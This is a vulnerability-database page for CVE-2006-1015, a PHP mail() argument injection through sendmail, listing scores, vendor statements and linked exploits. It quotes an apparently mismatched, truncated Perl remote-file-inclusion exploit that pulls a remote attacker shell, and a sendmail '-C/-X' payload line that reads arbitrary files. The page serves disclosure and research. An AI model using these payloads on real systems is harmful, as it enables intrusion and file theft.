CVE-2006-1015
Published: 2006-03-07
CVE-2006-1015: Argument injection vulnerability in certain PHP 3.x, 4.x, and 5.x applications, when used with sendmail and when accepting remote input for the…
Priority: P3 · 38 · medium · CVSS 2.0: 6.4
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 11.08% (95.4th percentile)
Argument injection vulnerability in certain PHP 3.x, 4.x, and 5.x applications, when used with sendmail and when accepting remote input for the additional_parameters argument to the mail function, allows remote attackers to read and create arbitrary files via the sendmail -C and -X arguments. NOTE: it could be argued that this is a class of technology-specific vulnerability, instead of a particular instance; if so, then this should not be included in CVE.
Affected
60 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | — | — |
CVSS provenance
nvd · v2.0 · 6.4 · MEDIUM · AV:N/AC:L/Au:N/C:P/I:P/A:N
vendor_redhat · 6.4 · MEDIUM
GHSA
GHSA-pjvh-w3q2-44j5: Argument injection vulnerability in certain PHP 3
ghsa_unreviewed·2022-05-01
CVE-2006-1015 [MEDIUM] GHSA-pjvh-w3q2-44j5: Argument injection vulnerability in certain PHP 3
Red Hat
CVE-2006-1015: Argument injection vulnerability in certain PHP 3
vendor_redhat·CVSS 6.4
CVE-2006-1015 [MEDIUM] CVE-2006-1015: Argument injection vulnerability in certain PHP 3
Statement: We do not consider these to be security issues:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1
Exploit-DB
Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion
exploitdb·2006-12-08
CVE-2006-6551 Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion
---
#!/usr/bin/perl
#Tucows Open Project --Remote File Inclusion Vulnerability
#Bug Found & Exploit [c]oded By Dr Max Virus
#Download:http://developer.tucows.com/code/ccs/downloads/ccs-open-1.2.1015-2006-209-1337.zip
use LWP::UserAgent;
$target=@ARGV[0];
$shellsite=@ARGV[1];
$cmdv=@ARGV[2];
if($target!~/http:\/\// || $shellsite!~/http:\/\// || !$cmdv)
{
usg()
}
header();
while()
{
print "[Shell] \$";
while ()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req =
HTTP::Request->new(GET=>$target.'/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]='.$shellsite='.?&'.$cmdv.'='.$cmd)or
die "\n\n Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->conte
Exploit-DB
PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation
exploitdb·2006-02-28
CVE-2006-1015 PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation
---
source: https://www.securityfocus.com/bid/16878/info
PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions.
$additional_param = "-C ".$file_to_read." -X ".getcwd()."/".$output_file;
http://secunia.com/advisories/19979
http://securityreason.com/securityalert/517
http://www.novell.com/linux/security/advisories/05-05-2006.html
http://www.securityfocus.com/archive/1/426497/100/0/threaded
http://www.securityfocus.com/bid/16878